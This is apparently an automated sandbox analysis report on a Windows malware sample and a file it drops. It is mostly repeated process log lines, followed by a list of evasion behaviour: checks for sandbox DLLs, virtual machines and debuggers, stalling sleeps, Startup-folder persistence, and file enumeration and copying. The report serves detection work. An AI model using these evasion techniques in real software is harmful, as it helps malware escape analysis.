                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_17-36350
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeStalling execution: Execution stalls by calling Sleepgraph_13-18765
                        Source: file_22613.exeBinary or memory string: DIR_WATCH.DLL
                        Source: file_22613.exeBinary or memory string: SBIEDLL.DLL
                        Source: file_22613.exeBinary or memory string: API_LOG.DLL
                        Source: file_22613.exe, 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CCONOUT$AVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLLCL8K19Z
                        Source: file_22613.exe, 00000012.00000002.526917748.000000000F878000.00000002.00000001.00020000.00000000.sdmpBinary or memory string: CONOUT$AVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLLCL8K19Z
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_17-36549
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe TID: 2424Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe TID: 5152Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe TID: 2064Thread sleep time: -900000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe TID: 6296Thread sleep count: 288 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe TID: 6296Thread sleep time: -51840000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe TID: 6304Thread sleep time: -50000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe TID: 6300Thread sleep count: 268 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe TID: 6300Thread sleep time: -48240000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe TID: 6336Thread sleep count: 48 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe TID: 6612Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe TID: 6540Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_17-35780
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0041628C GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 004163B0h17_2_0041628C
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeAPI coverage: 9.7 %
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00C688BA rdtsc 17_2_00C688BA
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeThread delayed: delay time: 50000Jump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_004099F2 _memset,_memset,_memset,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,17_2_004099F2
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeAPI call chain: ExitProcess graph end nodegraph_17-36313
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeAPI call chain: ExitProcess graph end nodegraph_17-35769
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeAPI call chain: ExitProcess graph end nodegraph_17-35949
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeAPI call chain: ExitProcess graph end nodegraph_17-36229
                        Source: file_22613.exe, 00000011.00000002.512344762.0000000001503000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.307033295.0000000006F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.306882846.0000000006F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00405230 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,13_2_00405230
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_0041E2F2 FindFirstFileExW,13_2_0041E2F2
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00408117 __EH_prolog3_GS,_memset,_memset,_memset,_memset,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcatW,FindNextFileW,FindClose,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,FindClose,17_2_00408117
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00411133 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,17_2_00411133
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0040950A wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,PathMatchSpecA,FindNextFileA,FindClose,17_2_0040950A
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0041778D __EH_prolog3_GS,FindFirstFileW,FindNextFileW,17_2_0041778D
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0040895E __EH_prolog3_GS,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,17_2_0040895E
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00412AE1 __EH_prolog3_GS,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,FindNextFileA,FindClose,17_2_00412AE1
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00408B6B __EH_prolog3_GS,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,FindNextFileA,FindClose,17_2_00408B6B
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00412D6E __EH_prolog3_GS,wsprintfA,FindFirstFileA,GetFileAttributesA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,FindNextFileA,FindClose,17_2_00412D6E
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00411E67 __EH_prolog3_GS,__wgetenv,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,17_2_00411E67
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00410EAE wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,17_2_00410EAE
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00C7DA0D LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,17_2_00C7DA0D
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00419182 mov eax, dword ptr fs:[00000030h]13_2_00419182
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_004153F1 mov eax, dword ptr fs:[00000030h]13_2_004153F1
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00401000 mov eax, dword ptr fs:[00000030h]17_2_00401000
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00417CF6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00417CF6
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00402C50 DeleteObject,GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,13_2_00402C50
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00C688BA rdtsc 17_2_00C688BA
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeMemory allocated: page read and write | page guardJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00413798 SetUnhandledExceptionFilter,13_2_00413798
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_004139E3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_004139E3
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00417CF6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00417CF6
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00413633 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00413633
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00C7F51F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,17_2_00C7F51F
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00C71705 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00C71705
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00C71F05 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00C71F05
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0042B2E9 SetUnhandledExceptionFilter,17_2_0042B2E9
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00424D60 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00424D60
